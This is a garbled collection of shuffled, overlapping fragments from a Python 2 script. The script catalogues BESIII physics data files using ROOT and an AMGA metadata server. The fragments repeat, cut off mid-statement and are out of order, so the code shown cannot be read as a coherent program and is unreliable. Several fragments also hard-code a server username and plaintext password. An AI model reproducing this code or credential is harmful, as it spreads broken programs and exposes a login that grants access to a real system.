"gROOT.ProcessLine('gSystem->Load(\"libRootEventData.so\");') gROOT.ProcessLine('TFile file(\"%s\");'%rootfile) gROOT.ProcessLine('TTree* tree =(TTree*)file.Get(\"JobInfoTree\");') gROOT.ProcessLine('TTree* tree1 =(TTree*)file.Get(\"Event\");') gROOT.ProcessLine('TBranch* branch =(TBranch*)tree->GetBranch(\"JobInfo\");') gROOT.ProcessLine('TBranch*",
"return \"error\" attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"description\"] = \"null\" #if resonance in filename is",
"rootfile for dstfile os.symlink(dstfile,rootfile) return rootfile #dstfile like /bes3fs/offline/data/655-1/4040/dst/110504/run_0023474_All_file007_SFO-2.dst, #return run_0023474_All_file007_SFO-2 def getLFN(dstfile,format=[\".dst\",\".tag\"]):",
"#this dst file has several runIds,get them from JobOptions by calling getRunIdList function",
"result[\"runH\"] = string.atoi(items[4]) return result #get runIdList from JobOptions def getRunIdList(jobOptions): result =",
"= {} lfnInfo = {} runIds = [] #change the .dst file to",
"#if this rootfile has exists,then delete it if os.path.exists(rootfile): os.unlink(rootfile) #create a new",
"#members' style in items is string,we need to change their style to integer",
"use new file naming rule, #file name like resonance_eventType_streamId_runL_runH_*.dst import os import os.path",
"lfnInfo[\"runH\"]: attributes[\"runL\"] = lfnInfo[\"runL\"] attributes[\"runH\"] = lfnInfo[\"runH\"] #get expNum and Resonance by calling",
"== lfnInfo[\"runH\"]: attributes[\"runL\"] = lfnInfo[\"runL\"] attributes[\"runH\"] = lfnInfo[\"runH\"] #get expNum and Resonance by",
"attributes[\"runId\"] == lfnInfo[\"runL\"]: runIds.append(attributes[\"runId\"]) attributes[\"runL\"] = attributes[\"runId\"] attributes[\"runH\"] = attributes[\"runId\"] #get expNum and",
"attributes[\"jobOptions\"] return attributes if __name__==\"__main__\": import time start=time.time() obj = DataAll(\"/bes3fs/offline/data/661-1/psipp/dst/100118/run_0011414_All_file001_SFO-1.dst\",\"/panfs/panfs.ihep.ac.cn/home/data/linl/DataAll/new/all/test_661.root\") end =",
"from root file def getCommonInfo(rootfile): commoninfo = {} gROOT.ProcessLine('gSystem->Load(\"libRootEventData.so\");') gROOT.ProcessLine('TFile file(\"%s\");'%rootfile) gROOT.ProcessLine('TTree* tree",
"None: #get a string like:-10513,0,-10629 runIds = list.group() #split runIds according ',' items=runIds.split(',')",
"wrong to this file print \"serveral resonance:\",resList return False #only including one expNum",
"attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"description\"] = \"null\" #if resonance in filename is same as",
"#if including several expNums,combine these expNum into mexpN1pN2p... sorted(expNumList) str = \"m\" +",
"False: print \"Can't get expNum and resonance of this file\" return \"error\" attributes[\"expNum\"]",
"splitLFN function lfnInfo = splitLFN(attributes[\"LFN\"],\"others\") #if runL is equal to runH,this file only",
"- end) start = time.time() obj = DataAll(\"/bes3fs/offline/data/655-1/psipp/dst/100118/run_0011414_All_file001_SFO-1.dst\",\"/panfs/panfs.ihep.ac.cn/home/data/linl/DataAll/new/all/test_655.root\") end = time.time() print \"655:\",str(start",
"lfnInfo[\"resonance\"] else: print \"Error %s:resonance in filename is %s,in ExpSearch is %s\"%(self.dstfile,lfnInfo[\"resonance\"],expRes[\"resonance\"]) return",
"this file print \"serveral resonance:\",resList return False #only including one expNum if len(expNumList)",
"resonance in filename is same as resonance that get from ExpSearch if expRes[\"resonance\"]",
"= 0 #print \"file\",file for format in srcformat: #if format of file is",
"= string.atoi(result[2]) for runid in runids: #check all runid whether between runfrm and",
"runIdList = [] str1=jobOptions[0] pat = re.compile(r'RunIdList= {-\\d+(,-?\\d+)+}') res1 = pat.search(str1) if res1",
"#type of srcformat is list,it includes many formats def checkFormat(srcformat,file): flag = 0",
"commoninfo[\"eventNum\"] = ROOT.num #get TotEvtNo #commoninfo[\"TotEvtNo\"] = list(i for i in ROOT.jobInfo.getTotEvtNo()) #get",
"flag #Before reading information from .root file,we need to use changeFormat #function to",
"JudgeFormat(format) return #split dstfile by \"/\",then get \"lfn.dst\" items=dstfile.split(\"/\") length=len(items) filename=items[length-1] #split \"*.dst\"",
"if result[4] not in resList: resList.append(result[4]) #only including one resonance if len(resList) ==",
"min(result[\"runIdList\"]) if runL == lfnInfo[\"runL\"]: if runH == lfnInfo[\"runH\"]: attributes[\"runL\"] = lfnInfo[\"runL\"] attributes[\"runH\"]",
"=(TTree*)file.Get(\"JobInfoTree\");') gROOT.ProcessLine('TTree* tree1 =(TTree*)file.Get(\"Event\");') gROOT.ProcessLine('TBranch* branch =(TBranch*)tree->GetBranch(\"JobInfo\");') gROOT.ProcessLine('TBranch* branch1 =(TBranch*)tree1->GetBranch(\"TEvtHeader\");') gROOT.ProcessLine('TJobInfo* jobInfo =",
"= lfn.split(\"_\") if type == \"all\": if items[2] == \"All\": runId = string.atoi(items[1])",
"self.rootfile = rootfile def getAttributes(self): #store all attributes attributes = {} expRes =",
"for dstfile os.symlink(dstfile,rootfile) return rootfile #dstfile like /bes3fs/offline/data/655-1/4040/dst/110504/run_0023474_All_file007_SFO-2.dst, #return run_0023474_All_file007_SFO-2 def getLFN(dstfile,format=[\".dst\",\".tag\"]): flag",
"flag==0: raise JudgeFormat(destformat) return #if this rootfile has exists,then delete it if os.path.exists(rootfile):",
"JobOptions by calling getRunIdList function result = getRunIdList(attributes[\"jobOptions\"]) if result is not None:",
"is equal to runId in rootfile if attributes[\"runId\"] == lfnInfo[\"runL\"]: runIds.append(attributes[\"runId\"]) attributes[\"runL\"] =",
"of file is in srcformat if file.endswith(format): flag = 1 return flag #Before",
"time start=time.time() obj = DataAll(\"/bes3fs/offline/data/661-1/psipp/dst/100118/run_0011414_All_file001_SFO-1.dst\",\"/panfs/panfs.ihep.ac.cn/home/data/linl/DataAll/new/all/test_661.root\") end = time.time() print \"661:\",str(start - end) start",
"result #get Boss version, runid, Entry number, JobOptions from root file def getCommonInfo(rootfile):",
"all attributes attributes = {} expRes = {} runIds = [] #change the",
"time #get number behiend string \"exp\" def getNum(expNum): format = re.compile(r\"\\d+\") res =",
"resonance_eventType_streamId_runL_runH_*.dst #get bossVer,runL,runH,eventNum by reading information from rootfile class Others(object): def __init__(self,dstfile,rootfile): self.dstfile",
"= %d,but runId in the root file is %d\"%(self.dstfile,lfnInfo[\"runL\"],attributes[\"runId\"]) return \"error\" else: #this",
"if res1 is not None: #get a string like:RunIdList={-10513,0,-10629} str2 = res1.group() result[\"description\"]",
"getFileSize(dstfile,format = [\".dst\",\".tag\"]): flag = checkFormat(format,dstfile) if flag==0: raise JudgeFormat(format) return if os.path.exists(dstfile):",
"#only including one resonance if len(resList) == 1: expRes[\"resonance\"] = resList[0] else: #has",
"result[3] not in expNumList: expNumList.append(result[3]) #resonance of this id isn't in resonance List,add",
"#print \"file\",file for format in srcformat: #if format of file is in srcformat",
"1: expRes[\"expNum\"] = expNumList[0] else: #if including several expNums,combine these expNum into mexpN1pN2p...",
"file is %d\"%(self.dstfile,lfnInfo[\"runL\"],attributes[\"runId\"]) return \"error\" else: #this dst file has several runIds,get them",
"if i!='0': runid=abs(string.atoi(i)) runIdList.append(runid) result[\"runIdList\"] = runIdList return result #get Boss version, runid,",
"ROOT.num #get TotEvtNo #commoninfo[\"TotEvtNo\"] = list(i for i in ROOT.jobInfo.getTotEvtNo()) #get JobOption commoninfo[\"jobOptions\"]",
"rootfile if attributes[\"runId\"] == lfnInfo[\"runL\"]: runIds.append(attributes[\"runId\"]) attributes[\"runL\"] = attributes[\"runId\"] attributes[\"runH\"] = attributes[\"runId\"] #get",
"root file is %d\"%(self.dstfile,lfnInfo[\"runL\"],attributes[\"runId\"]) return \"error\" else: #this dst file has several runIds,get",
"return \"error\" #set values of attribute status,streamId,Description #and these values are null #-1",
"== \"all\": if items[2] == \"All\": runId = string.atoi(items[1]) return runId else: result[\"resonance\"]",
"amga def eventTypeCheck(eventType): entries = [] client = mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r') #client = mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root') client.listEntries('/BES3_test/EventTypeList')",
"of each entry #under catalog \"/BES3/ExpSearch\" if runfrm<=runid<=runto: #if this runid between runfrm",
"#split \"*.dst\" by \".\" #get lfn lfn = filename.split('.')[0] return lfn #get size",
"return \"error\" else: print \"Error %s:runL in filename is %d,in jobOptions is %d\"%(self.dstfile,lfnInfo[\"runL\"],runL)",
"time.time() print \"661:\",str(start - end) start = time.time() obj = DataAll(\"/bes3fs/offline/data/655-1/psipp/dst/100118/run_0011414_All_file001_SFO-1.dst\",\"/panfs/panfs.ihep.ac.cn/home/data/linl/DataAll/new/all/test_655.root\") end =",
"\"lfn.dst\" items=dstfile.split(\"/\") length=len(items) filename=items[length-1] #split \"*.dst\" by \".\" #get lfn lfn = filename.split('.')[0]",
"rootfile = changeFormat(self.dstfile,self.rootfile) if getFileSize(self.dstfile)<5000: print \"Content of this file is null:\",self.dstfile return",
"{} lfnInfo = {} runIds = [] #change the .dst file to .root",
"re.compile(r\"\\d+\") res = format.search(expNum) if res is not None: return res.group() #Get expNum",
"attributes[\"runL\"] = lfnInfo[\"runL\"] attributes[\"runH\"] = lfnInfo[\"runH\"] #get expNum and Resonance by calling getExpRes(runid)",
"attributes[\"LFN\"] = getLFN(self.dstfile) #get resonance,eventType,streamId,runL,runH in filename by calling splitLFN function lfnInfo =",
"number, JobOptions from root file def getCommonInfo(rootfile): commoninfo = {} gROOT.ProcessLine('gSystem->Load(\"libRootEventData.so\");') gROOT.ProcessLine('TFile file(\"%s\");'%rootfile)",
"like resonance_eventType_streamId_runL_runH_*.dst #get bossVer,runL,runH,eventNum by reading information from rootfile class Others(object): def __init__(self,dstfile,rootfile):",
"\"/BES3/ExpSearch\" if runfrm<=runid<=runto: #if this runid between runfrm and runto,and expNum isn't in",
"result[\"eventType\"] = items[1] result[\"streamId\"] = items[2] result[\"runL\"] = string.atoi(items[3]) result[\"runH\"] = string.atoi(items[4]) return",
"in AMGA\"%(self.dstfile,lfnInfo[\"eventType\"]) return \"error\" #set values of attribute status #-1 <=> value of",
"by calling splitLFN function lfnInfo = splitLFN(attributes[\"LFN\"],\"others\") #if runL is equal to runH,this",
"values are null #-1 <=> value of status is null #-1 <=> value",
"# -*- coding:utf-8 -*- # author: linlei #for data/all name of file like",
"create a .root link for .dst file def changeFormat(dstfile,rootfile,srcformat=[\".dst\",\".tag\"],destformat=[\".root\"]): flag = checkFormat(srcformat,dstfile) if",
"list(i for i in ROOT.jobInfo.getJobOptions()) #set DataType commoninfo[\"dataType\"]='dst' return commoninfo #get bossVer,eventNum,dataType,fileSize,name,eventType,expNum, #resonance,runH,runL,status,streamId,description",
"entry = client.getEntry()[0] while entry: entries.append(entry) entry = client.getEntry()[0] for entry in entries:",
"%s,in ExpSearch is %s\"%(self.dstfile,lfnInfo[\"resonance\"],expRes[\"resonance\"]) return \"error\" else: print \"Error %s:runH in filename is",
"def __init__(self,dstfile,rootfile): self.dstfile = dstfile self.rootfile = rootfile def getAttributes(self): #store all attributes",
"[] resList = [] #print\"runids\",runids client = mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r') #client = mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root') #get all",
"def getRunIdList(jobOptions): result = {} runIdList = [] str1=jobOptions[0] pat = re.compile(r'RunIdList= {-\\d+(,-?\\d+)+}')",
"= result[\"description\"] if expRes[\"resonance\"] == lfnInfo[\"resonance\"]: attributes[\"resonance\"] = lfnInfo[\"resonance\"] else: print \"Error %s:resonance",
"if lfnInfo[\"runL\"] == lfnInfo[\"runH\"]: #if runId in filename also is equal to runId",
"\"file\",file for format in srcformat: #if format of file is in srcformat if",
"file.endswith(format): flag = 1 return flag #Before reading information from .root file,we need",
"res1 = pat.search(str1) if res1 is not None: #get a string like:RunIdList={-10513,0,-10629} str2",
"flag==0: raise JudgeFormat(format) return if os.path.exists(dstfile): #get file's size return os.path.getsize(dstfile) #lfn like",
"getExpRes(runids): entries = [] expRes = {} expNumList = [] resList = []",
"eventTypeList in amga def eventTypeCheck(eventType): entries = [] client = mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r') #client =",
"checkFormat(format,dstfile) if flag==0: raise JudgeFormat(format) return #split dstfile by \"/\",then get \"lfn.dst\" items=dstfile.split(\"/\")",
"attribute runId def splitLFN(lfn,type): result = {} items = lfn.split(\"_\") if type ==",
"in filename if attributes[\"runId\"] == runId: runIds.append(attributes[\"runId\"]) #get expNum and Resonance by calling",
"expRes[\"resonance\"] == lfnInfo[\"resonance\"]: attributes[\"resonance\"] = lfnInfo[\"resonance\"] else: print \"Error %s:resonance in filename is",
"& mc, we use new file naming rule, #file name like resonance_eventType_streamId_runL_runH_*.dst import",
"\"serveral resonance:\",resList return False #only including one expNum if len(expNumList) == 1: expRes[\"expNum\"]",
"getLFN function attributes[\"fileSize\"] = getFileSize(self.dstfile) attributes[\"LFN\"] = getLFN(self.dstfile) #get resonance,eventType,streamId,runL,runH in filename by",
"%d,in rootfile is %d\"%(self.dstfile,lfnInfo[\"runId\"],attributes[\"runId\"]) return \"error\" #set values of attribute status,streamId,Description #and these",
"= getLFN(self.dstfile) #get resonance,eventType,streamId,runL,runH in filename by calling splitLFN function lfnInfo = splitLFN(attributes[\"LFN\"],\"others\")",
"to .root file rootfile = changeFormat(self.dstfile,self.rootfile) if getFileSize(self.dstfile)<5000: print \"Content of this file",
"#if this runid between runfrm and runto,and expNum isn't in expNumList #add this",
"\".\" #get lfn lfn = filename.split('.')[0] return lfn #get size of dst file",
"#check whether eventType is stored in eventTypeList in amga def eventTypeCheck(eventType): entries =",
"= [] str1=jobOptions[0] pat = re.compile(r'RunIdList= {-\\d+(,-?\\d+)+}') res1 = pat.search(str1) if res1 is",
"to runId in rootfile if attributes[\"runId\"] == lfnInfo[\"runL\"]: runIds.append(attributes[\"runId\"]) attributes[\"runL\"] = attributes[\"runId\"] attributes[\"runH\"]",
"all entries commoninfo[\"eventNum\"] = ROOT.num #get TotEvtNo #commoninfo[\"TotEvtNo\"] = list(i for i in",
"#check all runid whether between runfrm and runto of each entry #under catalog",
"resonance_eventType_streamId_runL_runH_*.dst import os import os.path import ROOT from ROOT import gROOT from amga",
"#function to create a .root link for .dst file def changeFormat(dstfile,rootfile,srcformat=[\".dst\",\".tag\"],destformat=[\".root\"]): flag =",
"get expNum and resonance of this file\" return \"error\" attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"resonance\"]",
"to this file print \"serveral resonance:\",resList return False #only including one expNum if",
"a string like:RunIdList={-10513,0,-10629} str2 = res1.group() result[\"description\"] = str2 pat = re.compile(r'-\\d+(,-?\\d+)+') list",
"is not \",self.format) #type of srcformat is list,it includes many formats def checkFormat(srcformat,file):",
"import mdclient,mdinterface import string import re import time #get number behiend string \"exp\"",
"by calling getLFN function attributes[\"fileSize\"] = getFileSize(self.dstfile) attributes[\"LFN\"] = getLFN(self.dstfile) #for .dst files",
"del attributes[\"jobOptions\"] return attributes if __name__==\"__main__\": import time start=time.time() obj = DataAll(\"/bes3fs/offline/data/661-1/psipp/dst/100118/run_0011414_All_file001_SFO-1.dst\",\"/panfs/panfs.ihep.ac.cn/home/data/linl/DataAll/new/all/test_661.root\") end",
"one runId if lfnInfo[\"runL\"] == lfnInfo[\"runH\"]: #if runId in filename also is equal",
"this file\" return \"error\" attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"resonance\"] = expRes[\"resonance\"] #set RunH=RunId and",
"resList.append(result[4]) #only including one resonance if len(resList) == 1: expRes[\"resonance\"] = resList[0] else:",
"several resonances,may be has something wrong to this file print \"serveral resonance:\",resList return",
"has several runIds,get them from JobOptions by calling getRunIdList function result = getRunIdList(attributes[\"jobOptions\"])",
"from file name #file name like resonance_eventType_streamId_runL_runH_*.dst #get bossVer,runL,runH,eventNum by reading information from",
"attributes[\"description\"] = \"null\" #if resonance in filename is same as resonance that get",
"many formats def checkFormat(srcformat,file): flag = 0 #print \"file\",file for format in srcformat:",
"#client = mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root') #get all entries under catalog \"/BES3/ExpSearch\" client.listEntries('/BES3_test/ExpSearch') entry = client.getEntry()[0]",
"and Resonance by calling getExpRes() expRes = getExpRes(runIds) if expRes == False: print",
"os.path.getsize(dstfile) #lfn like resonance_eventType_streamId_runL_runH_*,get attributes:resonance,eventType,streamId,runL,runH #lfn like run_0009947_All_file001_SFO-1,get attribute runId def splitLFN(lfn,type): result",
"= runIdList return result #get Boss version, runid, Entry number, JobOptions from root",
"rootfile class Others(object): def __init__(self,dstfile,rootfile): self.dstfile = dstfile self.rootfile = rootfile def getAttributes(self):",
"#get RunId commoninfo[\"runId\"] = abs(ROOT.evtHeader.getRunId()) #get all entries commoninfo[\"eventNum\"] = ROOT.num #get TotEvtNo",
"else: print \"Error %s:resonance in filename is %s,in ExpSearch is %s\"%(self.dstfile,lfnInfo[\"resonance\"],expRes[\"resonance\"]) return \"error\"",
"== 1: expRes[\"resonance\"] = resList[0] else: #has several resonances,may be has something wrong",
".root file,we need to use changeFormat #function to create a .root link for",
"it to resList if result[4] not in resList: resList.append(result[4]) #only including one resonance",
"= {} runIdList = [] str1=jobOptions[0] pat = re.compile(r'RunIdList= {-\\d+(,-?\\d+)+}') res1 = pat.search(str1)",
"getFileSize function #get lfn by calling getLFN function attributes[\"fileSize\"] = getFileSize(self.dstfile) attributes[\"LFN\"] =",
"runto,and expNum isn't in expNumList #add this expNum to expNumList if result[3] not",
"repr(\"the File's format is not \",self.format) #type of srcformat is list,it includes many",
"whether eventType is stored in eventTypeList in amga def eventTypeCheck(eventType): entries = []",
"string.atoi(result[1]) runto = string.atoi(result[2]) for runid in runids: #check all runid whether between",
"return False #only including one expNum if len(expNumList) == 1: expRes[\"expNum\"] = expNumList[0]",
"for i in ROOT.jobInfo.getTotEvtNo()) #get JobOption commoninfo[\"jobOptions\"] = list(i for i in ROOT.jobInfo.getJobOptions())",
"if attributes[\"runId\"] == runId: runIds.append(attributes[\"runId\"]) #get expNum and Resonance by calling getExpRes(runIds) expRes",
"file has several runIds,get them from JobOptions by calling getRunIdList function result =",
"{} items = lfn.split(\"_\") if type == \"all\": if items[2] == \"All\": runId",
"#judge format of file class JudgeFormat(Exception): def __init__(self, format): self.format = format def",
"return #if this rootfile has exists,then delete it if os.path.exists(rootfile): os.unlink(rootfile) #create a",
"this file is null:\",self.dstfile return \"error\" else: attributes = getCommonInfo(rootfile) #get filesize by",
"and resonance of this file\" return \"error\" attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"description\"] = \"null\"",
"resList if result[4] not in resList: resList.append(result[4]) #only including one resonance if len(resList)",
"#get all entries under catalog \"/BES3/ExpSearch\" client.listEntries('/BES3_test/ExpSearch') entry = client.getEntry()[0] while entry: entries.append(entry)",
"attributes[\"runId\"] #get expNum and Resonance by calling getExpRes() expRes = getExpRes(runIds) if expRes",
"filename is %d,in jobOptions is %d\"%(self.dstfile,lfnInfo[\"runL\"],runL) return \"error\" #get streamId from filename attributes[\"streamId\"]",
"entry client.getattr(entry,['FILE']) result = client.getEntry()[1] #compare eventType with name of each entry if",
"file only has one runId if lfnInfo[\"runL\"] == lfnInfo[\"runH\"]: #if runId in filename",
"runto of each entry #under catalog \"/BES3/ExpSearch\" if runfrm<=runid<=runto: #if this runid between",
"#get a string like:RunIdList={-10513,0,-10629} str2 = res1.group() result[\"description\"] = str2 pat = re.compile(r'-\\d+(,-?\\d+)+')",
"\"error\" #set values of attribute status #-1 <=> value of status is null",
"start = time.time() obj = DataAll(\"/bes3fs/offline/data/655-1/psipp/dst/100118/run_0011414_All_file001_SFO-1.dst\",\"/panfs/panfs.ihep.ac.cn/home/data/linl/DataAll/new/all/test_655.root\") end = time.time() print \"655:\",str(start - end)",
"need to change their style to integer for i in items: if i!='0':",
"lfnInfo[\"runL\"]: if runH == lfnInfo[\"runH\"]: attributes[\"runL\"] = lfnInfo[\"runL\"] attributes[\"runH\"] = lfnInfo[\"runH\"] #get expNum",
"from ExpSearch according runids def getExpRes(runids): entries = [] expRes = {} expNumList",
"getFileSize(self.dstfile) attributes[\"LFN\"] = getLFN(self.dstfile) #for .dst files of Data/All,their EventType are \"all\" attributes[\"eventType\"]",
"== lfnInfo[\"runL\"]: runIds.append(attributes[\"runId\"]) attributes[\"runL\"] = attributes[\"runId\"] attributes[\"runH\"] = attributes[\"runId\"] #get expNum and Resonance",
"flag = 0 #print \"file\",file for format in srcformat: #if format of file",
"file's size return os.path.getsize(dstfile) #lfn like resonance_eventType_streamId_runL_runH_*,get attributes:resonance,eventType,streamId,runL,runH #lfn like run_0009947_All_file001_SFO-1,get attribute runId",
"files of Data/All,their EventType are \"all\" attributes[\"eventType\"] = \"all\" #get runId from filename",
"attributes[\"status\"] = -1 attributes[\"streamId\"] = 'stream0' attributes[\"description\"] = 'null' del attributes[\"runId\"] del attributes[\"jobOptions\"]",
"not in resList: resList.append(result[4]) #only including one resonance if len(resList) == 1: expRes[\"resonance\"]",
"items=runIds.split(',') #members' style in items is string,we need to change their style to",
"#get JobOption commoninfo[\"jobOptions\"] = list(i for i in ROOT.jobInfo.getJobOptions()) #set DataType commoninfo[\"dataType\"]='dst' return",
"to use changeFormat #function to create a .root link for .dst file def",
"#get expNum and Resonance by calling getExpRes(runIds) expRes = getExpRes(runIds) if expRes ==",
"#get bossVer,runL,runH,eventNum by reading information from rootfile class Others(object): def __init__(self,dstfile,rootfile): self.dstfile =",
"integer for i in items: if i!='0': runid=abs(string.atoi(i)) runIdList.append(runid) result[\"runIdList\"] = runIdList return",
"resonance_eventType_streamId_runL_runH_*,get attributes:resonance,eventType,streamId,runL,runH #lfn like run_0009947_All_file001_SFO-1,get attribute runId def splitLFN(lfn,type): result = {} items",
"runid=abs(string.atoi(i)) runIdList.append(runid) result[\"runIdList\"] = runIdList return result #get Boss version, runid, Entry number,",
"is null attributes[\"status\"] = -1 attributes[\"streamId\"] = 'stream0' attributes[\"description\"] = 'null' del attributes[\"runId\"]",
"attributes[\"LFN\"] = getLFN(self.dstfile) #for .dst files of Data/All,their EventType are \"all\" attributes[\"eventType\"] =",
"= string.atoi(items[1]) return runId else: result[\"resonance\"] = items[0] result[\"eventType\"] = items[1] result[\"streamId\"] =",
"has one runId if lfnInfo[\"runL\"] == lfnInfo[\"runH\"]: #if runId in filename also is",
"from filename attributes[\"streamId\"] = lfnInfo[\"streamId\"] #check eventType in filename evtType_exists = eventTypeCheck(lfnInfo[\"eventType\"]) if",
"#get filesize by calling getFileSize function #get lfn by calling getLFN function attributes[\"fileSize\"]",
"formats def checkFormat(srcformat,file): flag = 0 #print \"file\",file for format in srcformat: #if",
"filesize by calling getFileSize function #get lfn by calling getLFN function attributes[\"fileSize\"] =",
"#return run_0023474_All_file007_SFO-2 def getLFN(dstfile,format=[\".dst\",\".tag\"]): flag = checkFormat(format,dstfile) if flag==0: raise JudgeFormat(format) return #split",
"\"runId of %s,in filename is %d,in rootfile is %d\"%(self.dstfile,lfnInfo[\"runId\"],attributes[\"runId\"]) return \"error\" #set values",
"this expNum to expNumList if result[3] not in expNumList: expNumList.append(result[3]) #resonance of this",
"pat = re.compile(r'-\\d+(,-?\\d+)+') list = pat.search(str2) if list is not None: #get a",
"__init__(self,dstfile,rootfile): self.dstfile = dstfile self.rootfile = rootfile def getAttributes(self): #store all attributes attributes",
"getExpRes() expRes = getExpRes(runIds) if expRes == False: print \"Can't get expNum and",
"runid in runids: #check all runid whether between runfrm and runto of each",
"#get all entries commoninfo[\"eventNum\"] = ROOT.num #get TotEvtNo #commoninfo[\"TotEvtNo\"] = list(i for i",
"expNumList[1:]: str = str + \"p+\" + getNum(expNum) expRes[\"expNum\"] = str return expRes",
"and runto of each entry #under catalog \"/BES3/ExpSearch\" if runfrm<=runid<=runto: #if this runid",
"= [] #print\"runids\",runids client = mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r') #client = mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root') #get all entries under",
"flag = 1 return flag #Before reading information from .root file,we need to",
"in ROOT.jobInfo.getJobOptions()) #set DataType commoninfo[\"dataType\"]='dst' return commoninfo #get bossVer,eventNum,dataType,fileSize,name,eventType,expNum, #resonance,runH,runL,status,streamId,description class DataAll(object): def",
"status is null attributes[\"status\"] = -1 del attributes[\"runId\"] del attributes[\"jobOptions\"] return attributes if",
"print \"Error:\",this.dstfile return \"error\" attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"description\"] = result[\"description\"] if expRes[\"resonance\"] ==",
"calling getExpRes(runid) expRes = getExpRes(result[\"runIdList\"]) if expRes == False: print \"Error:\",this.dstfile return \"error\"",
"True return False #judge format of file class JudgeFormat(Exception): def __init__(self, format): self.format",
"runIdList.append(runid) result[\"runIdList\"] = runIdList return result #get Boss version, runid, Entry number, JobOptions",
"result = client.getEntry()[1] #compare eventType with name of each entry if eventType ==",
"return True return False #judge format of file class JudgeFormat(Exception): def __init__(self, format):",
"\"error\" attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"description\"] = result[\"description\"] if expRes[\"resonance\"] == lfnInfo[\"resonance\"]: attributes[\"resonance\"] =",
"import gROOT from amga import mdclient,mdinterface import string import re import time #get",
"not None: #get a string like:RunIdList={-10513,0,-10629} str2 = res1.group() result[\"description\"] = str2 pat",
"= list(i for i in ROOT.jobInfo.getTotEvtNo()) #get JobOption commoninfo[\"jobOptions\"] = list(i for i",
"= {} expRes = {} runIds = [] #change the .dst file to",
"attributes[\"description\"] = 'null' del attributes[\"runId\"] del attributes[\"jobOptions\"] return attributes #get resonance,runL,runH,eventType,streamId,LFN from file",
"items is string,we need to change their style to integer for i in",
"%d,in jobOptions is %d\"%(self.dstfile,lfnInfo[\"runH\"],runH) return \"error\" else: print \"Error %s:runL in filename is",
"RunId commoninfo[\"runId\"] = abs(ROOT.evtHeader.getRunId()) #get all entries commoninfo[\"eventNum\"] = ROOT.num #get TotEvtNo #commoninfo[\"TotEvtNo\"]",
"def eventTypeCheck(eventType): entries = [] client = mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r') #client = mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root') client.listEntries('/BES3_test/EventTypeList') entry",
"amga client.getattr(item,['Id','runFrm','runTo','expNum','resonance']) result = client.getEntry()[1] # print item # print result runfrm =",
"= client.getEntry()[1] # print item # print result runfrm = string.atoi(result[1]) runto =",
"from amga import mdclient,mdinterface import string import re import time #get number behiend",
"#set values of attribute status #-1 <=> value of status is null attributes[\"status\"]",
"and Resonance by calling getExpRes(runIds) expRes = getExpRes(runIds) if expRes == False: print",
"\"Error %s:runL in filename is %d,in jobOptions is %d\"%(self.dstfile,lfnInfo[\"runL\"],runL) return \"error\" #get streamId",
"\"Error %s:runH in filename is %d,in jobOptions is %d\"%(self.dstfile,lfnInfo[\"runH\"],runH) return \"error\" else: print",
"get \"lfn.dst\" items=dstfile.split(\"/\") length=len(items) filename=items[length-1] #split \"*.dst\" by \".\" #get lfn lfn =",
"entry if eventType == result[0]: return True return False #judge format of file",
"filename=items[length-1] #split \"*.dst\" by \".\" #get lfn lfn = filename.split('.')[0] return lfn #get",
"#get name of each entry client.getattr(entry,['FILE']) result = client.getEntry()[1] #compare eventType with name",
"return False #judge format of file class JudgeFormat(Exception): def __init__(self, format): self.format =",
"__str__(self): return repr(\"the File's format is not \",self.format) #type of srcformat is list,it",
"#get lfn lfn = filename.split('.')[0] return lfn #get size of dst file def",
"lfnInfo[\"resonance\"]: attributes[\"resonance\"] = expRes[\"resonance\"] else: print \"Error %s:resonance in filename is %s,in ExpSearch",
"#change the .dst file to .root file rootfile = changeFormat(self.dstfile,self.rootfile) if getFileSize(self.dstfile)<5000: print",
"each entry client.getattr(entry,['FILE']) result = client.getEntry()[1] #compare eventType with name of each entry",
"not \",self.format) #type of srcformat is list,it includes many formats def checkFormat(srcformat,file): flag",
"TEvtHeader();') gROOT.ProcessLine('branch->SetAddress(&jobInfo);') gROOT.ProcessLine('branch1->SetAddress(&evtHeader);') gROOT.ProcessLine('branch->GetEntry(0);') gROOT.ProcessLine('branch1->GetEntry(0);') gROOT.ProcessLine('Int_t num=tree1.GetEntries()') #get Boss Version commoninfo[\"bossVer\"] = ROOT.jobInfo.getBossVer()",
"#dstfile like /bes3fs/offline/data/655-1/4040/dst/110504/run_0023474_All_file007_SFO-2.dst, #return run_0023474_All_file007_SFO-2 def getLFN(dstfile,format=[\".dst\",\".tag\"]): flag = checkFormat(format,dstfile) if flag==0: raise",
"gROOT.ProcessLine('branch->SetAddress(&jobInfo);') gROOT.ProcessLine('branch1->SetAddress(&evtHeader);') gROOT.ProcessLine('branch->GetEntry(0);') gROOT.ProcessLine('branch1->GetEntry(0);') gROOT.ProcessLine('Int_t num=tree1.GetEntries()') #get Boss Version commoninfo[\"bossVer\"] = ROOT.jobInfo.getBossVer() #get",
"= mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root') #get all entries under catalog \"/BES3/ExpSearch\" client.listEntries('/BES3_test/ExpSearch') entry = client.getEntry()[0] while",
"= getFileSize(self.dstfile) attributes[\"LFN\"] = getLFN(self.dstfile) #for .dst files of Data/All,their EventType are \"all\"",
"print item # print result runfrm = string.atoi(result[1]) runto = string.atoi(result[2]) for runid",
"#resonance of this id isn't in resonance List,add it to resList if result[4]",
"= [] resList = [] #print\"runids\",runids client = mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r') #client = mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root') #get",
